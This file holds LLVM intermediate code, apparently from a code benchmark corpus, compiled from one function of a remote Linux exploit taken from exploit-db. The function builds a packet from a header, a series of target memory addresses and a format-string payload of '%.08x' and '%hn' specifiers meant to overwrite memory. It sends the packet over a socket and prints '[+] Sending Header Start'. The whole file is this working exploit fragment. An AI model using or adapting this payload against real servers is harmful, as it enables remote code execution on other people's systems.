; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_806.c_send_start.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_806.c_send_start.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.TYPE_2__ = type { i64 }

@packet_start = common dso_local global i8* null, align 8
@targets = common dso_local global %struct.TYPE_2__* null, align 8
@.str = private unnamed_addr constant [143 x i8] c"%.08x%.08x%.08x%.08x%.08x%.08x%.08x%.08x%.08x%.08x    %.08x%.08x%.08x%.08x%.08x%.08x%.08x%.08x%.08x%.08x%.1792u%hn%hn%hn:%x%x%x%x%x%x%x%x%x%x@\00", align 1
@.str.1 = private unnamed_addr constant [5 x i8] c"send\00", align 1
@stderr = common dso_local global i32 0, align 4
@.str.2 = private unnamed_addr constant [26 x i8] c"[+] Sending Header Start\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @send_start(i32 %0, i32 %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i32, align 4
  %6 = alloca [1024 x i8], align 16
  %7 = alloca i8*, align 8
  store i32 %0, i32* %3, align 4
  store i32 %1, i32* %4, align 4
  store i32 0, i32* %5, align 4
  %8 = getelementptr inbounds [1024 x i8], [1024 x i8]* %6, i64 0, i64 0
  store i8* %8, i8** %7, align 8
  %9 = getelementptr inbounds [1024 x i8], [1024 x i8]* %6, i64 0, i64 0
  %10 = load i8*, i8** @packet_start, align 8
  %11 = call i32 @strcpy(i8* %9, i8* %10)
  %12 = load i8*, i8** @packet_start, align 8
  %13 = call i32 @strlen(i8* %12)
  %14 = load i8*, i8** %7, align 8
  %15 = sext i32 %13 to i64
  %16 = getelementptr inbounds i8, i8* %14, i64 %15
  store i8* %16, i8** %7, align 8
  br label %17

17:                                               ; preds = %20, %2
  %18 = load i32, i32* %5, align 4
  %19 = icmp slt i32 %18, 10
  br i1 %19, label %20, label %49

20:                                               ; preds = %17
  %21 = load %struct.TYPE_2__*, %struct.TYPE_2__** @targets, align 8
  %22 = load i32, i32* %4, align 4
  %23 = sub nsw i32 %22, 1
  %24 = sext i32 %23 to i64
  %25 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %21, i64 %24
  %26 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %25, i32 0, i32 0
  %27 = load i64, i64* %26, align 8
  %28 = add nsw i64 %27, 6
  %29 = inttoptr i64 %28 to i8*
  %30 = load i8*, i8** %7, align 8
  %31 = bitcast i8* %30 to i8**
  store i8* %29, i8** %31, align 8
  %32 = load i8*, i8** %7, align 8
  %33 = getelementptr inbounds i8, i8* %32, i64 4
  store i8* %33, i8** %7, align 8
  %34 = load %struct.TYPE_2__*, %struct.TYPE_2__** @targets, align 8
  %35 = load i32, i32* %4, align 4
  %36 = sub nsw i32 %35, 1
  %37 = sext i32 %36 to i64
  %38 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %34, i64 %37
  %39 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %38, i32 0, i32 0
  %40 = load i64, i64* %39, align 8
  %41 = add nsw i64 %40, 4
  %42 = inttoptr i64 %41 to i8*
  %43 = load i8*, i8** %7, align 8
  %44 = bitcast i8* %43 to i8**
  store i8* %42, i8** %44, align 8
  %45 = load i8*, i8** %7, align 8
  %46 = getelementptr inbounds i8, i8* %45, i64 4
  store i8* %46, i8** %7, align 8
  %47 = load i32, i32* %5, align 4
  %48 = add nsw i32 %47, 1
  store i32 %48, i32* %5, align 4
  br label %17

49:                                               ; preds = %17
  %50 = getelementptr inbounds [1024 x i8], [1024 x i8]* %6, i64 0, i64 0
  %51 = call i32 @strcat(i8* %50, i8* getelementptr inbounds ([143 x i8], [143 x i8]* @.str, i64 0, i64 0))
  %52 = load i32, i32* %3, align 4
  %53 = getelementptr inbounds [1024 x i8], [1024 x i8]* %6, i64 0, i64 0
  %54 = getelementptr inbounds [1024 x i8], [1024 x i8]* %6, i64 0, i64 0
  %55 = call i32 @strlen(i8* %54)
  %56 = call i32 @send(i32 %52, i8* %53, i32 %55, i32 0)
  %57 = icmp eq i32 %56, -1
  br i1 %57, label %58, label %60

58:                                               ; preds = %49
  %59 = call i32 @perror(i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str.1, i64 0, i64 0))
  br label %60

60:                                               ; preds = %58, %49
  %61 = load i32, i32* @stderr, align 4
  %62 = call i32 @fprintf(i32 %61, i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str.2, i64 0, i64 0))
  ret void
}

declare dso_local i32 @strcpy(i8*, i8*) #1

declare dso_local i32 @strlen(i8*) #1

declare dso_local i32 @strcat(i8*, i8*) #1

declare dso_local i32 @send(i32, i8*, i32, i32) #1

declare dso_local i32 @perror(i8*) #1

declare dso_local i32 @fprintf(i32, i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
